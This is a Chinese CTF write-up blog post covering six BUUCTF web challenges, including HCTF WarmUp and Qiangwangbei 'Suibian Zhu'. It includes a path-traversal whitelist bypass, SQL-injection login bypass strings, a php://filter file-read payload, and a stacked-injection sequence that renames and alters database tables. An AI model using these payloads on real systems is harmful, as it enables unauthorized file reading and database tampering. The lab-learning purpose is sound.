[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
文章目录
- [CTF从0到1学习] BUUCTF WEB部分 wp(待完善)
-
- [HCTF 2018]WarmUp
- [极客大挑战 2019]EasySQL
- [极客大挑战 2019]Havefun
- [ACTF2020 新生赛]Include
- [强网杯 2019]随便注
- [SUCTF 2019]EasySQL
[HCTF 2018]WarmUp
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第1张图片](http://img.e-com-net.com/image/info8/90356bc5eb80482d9d37a25b1916eab5.jpg)
首先看看网页源码呗
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第2张图片](http://img.e-com-net.com/image/info8/7ebec64170304cf78ece67ce5e829661.jpg)
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
//定义了一个数组
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
// 判断,变量是否为空,是否不是字符串
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
// 如果参数存在于数组中,返回true
if (in_array($page, $whitelist)) {
return true;
}
// mb_substr是截取函数,从0到?
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
// 如果变量在数组中,返回true
if (in_array($_page, $whitelist)) {
return true;
}
// 先进行url解码,然后截取字符,如果变量在数组中没返回true
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
![](\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\")
";
}
?>
可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求$page为字符串,否则返回false
第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true
第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true
第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f'),构造url:
所以我们的payload 就是
file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第3张图片](http://img.e-com-net.com/image/info8/d9d44bf453db41c79c91f35dd0529ef5.jpg)
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第4张图片](http://img.e-com-net.com/image/info8/6dbfa01bb8a943799e9beaa099165ad2.jpg)
成功拿到flag
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第5张图片](http://img.e-com-net.com/image/info8/8b2b95eb5f6f49ad9a8a4db14c5b4036.jpg)
[极客大挑战 2019]EasySQL
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第6张图片](http://img.e-com-net.com/image/info8/08dd2f46b3534e96b21fe4d6217116af.jpg)
这种就是抓抓包了,发现有单引号报错
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第7张图片](http://img.e-com-net.com/image/info8/68fe228799c64f6f8eeea1b8f25ddfb6.jpg)
那就是典型的万能密码了
payload:/check.php?username=admin'%20or%201=1%23&password=123
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第8张图片](http://img.e-com-net.com/image/info8/6b8a17d3d2ba43de9b18371fc0d46270.jpg)
[极客大挑战 2019]Havefun
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第9张图片](http://img.e-com-net.com/image/info8/02bc200addd74531966ae81f70fdf790.jpg)
先看网页源代码吧
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第10张图片](http://img.e-com-net.com/image/info8/8cd28c140af44ef5878bab25e8089bb4.jpg)
试了试cat=dog居然解出flag了。可能是那种签到题吧
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第11张图片](http://img.e-com-net.com/image/info8/5eedcb5b90fa4cbab0e8dbbfb072dbaf.jpg)
[ACTF2020 新生赛]Include
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第12张图片](http://img.e-com-net.com/image/info8/31f3d6a6180b49ea88a3ce10e40ed97f.jpg)
首先题目是include,所以会往文件包含去想
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第13张图片](http://img.e-com-net.com/image/info8/97ab2e530f424fb68e37c7ac370978c4.jpg)
尝试使用php://filter伪协议
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第14张图片](http://img.e-com-net.com/image/info8/2630c075736e434e94351c44cee291e7.jpg)
base64解码得
[强网杯 2019]随便注
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第15张图片](http://img.e-com-net.com/image/info8/127b577b29b148ee930da1108f055e89.jpg)
看一眼源码
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第16张图片](http://img.e-com-net.com/image/info8/7bfc3b0dacbb47beb1ac6e02207fa1e5.jpg)
单引号报错,找到注入点
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第17张图片](http://img.e-com-net.com/image/info8/6c825a704acd4879bff2e765d9f87d62.jpg)
union select 进行测试
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第18张图片](http://img.e-com-net.com/image/info8/d331e2841f674bf7ba2984c98a7c6f15.jpg)
然后就想到了堆叠注入,别问我怎么知道的。我被深育杯第一个虐惨了!!!
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第19张图片](http://img.e-com-net.com/image/info8/c92adda517b94841a1db860575ba71b5.jpg)
好像也就ctftraining这一个有用呗
然后看看表
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第20张图片](http://img.e-com-net.com/image/info8/5c65bc1401e24509a8d3e25a15e2ddf5.jpg)
然后看看两张表的结构
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第21张图片](http://img.e-com-net.com/image/info8/e36a0072268e4e48b9e823e4a44579b5.jpg)
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第22张图片](http://img.e-com-net.com/image/info8/0af691799b21468893739fc69fe20fd0.jpg)
那么可以猜测我们提交查询的窗口就是在这个表里查询数据的
- 那么查询语句很有可能是 : selsect id,data from words where id =
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦
1';rename words to words1;rename `1919810931114514` to words;alter table flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
再用一下一开始的操作id=1’ or 1=1#
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第23张图片](http://img.e-com-net.com/image/info8/6c4c79fe0699436ea2c9a7a617740ab5.jpg)
https://www.cnblogs.com/wjw-zm/p/12359735.html
[SUCTF 2019]EasySQL
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第24张图片](http://img.e-com-net.com/image/info8/808aca1bd35741d890dba3b9f699155c.jpg)
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第25张图片](http://img.e-com-net.com/image/info8/6537955475994425ab78ff82f3fb770b.jpg)
感觉没有过滤
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第26张图片](http://img.e-com-net.com/image/info8/6e5781e46d6649febd329d74c090eabd.jpg)
select都可以用
这道题目需要我们去对后端语句进行猜测
1、输入非零数字得到的回显1和输入其余字符得不到回显=>来判断出内部的查询语句可能存在有||
2、也就是select 输入的数据||内置的一个列名 from 表名=>即为
select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知)
此时的||起到的作用是or的作用
内置的sql语句为
sql=“select”.post[‘query’]."||flag from Flag";
如果$post[‘query’]的数据为*,1,sql语句就变成了
select *,1||flag from Flag
也就是
select *,1 from Flag
也就是直接查询出了Flag表中的所有内容
![[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)_第27张图片](http://img.e-com-net.com/image/info8/3781863f686b4768a15afc95227ba593.jpg)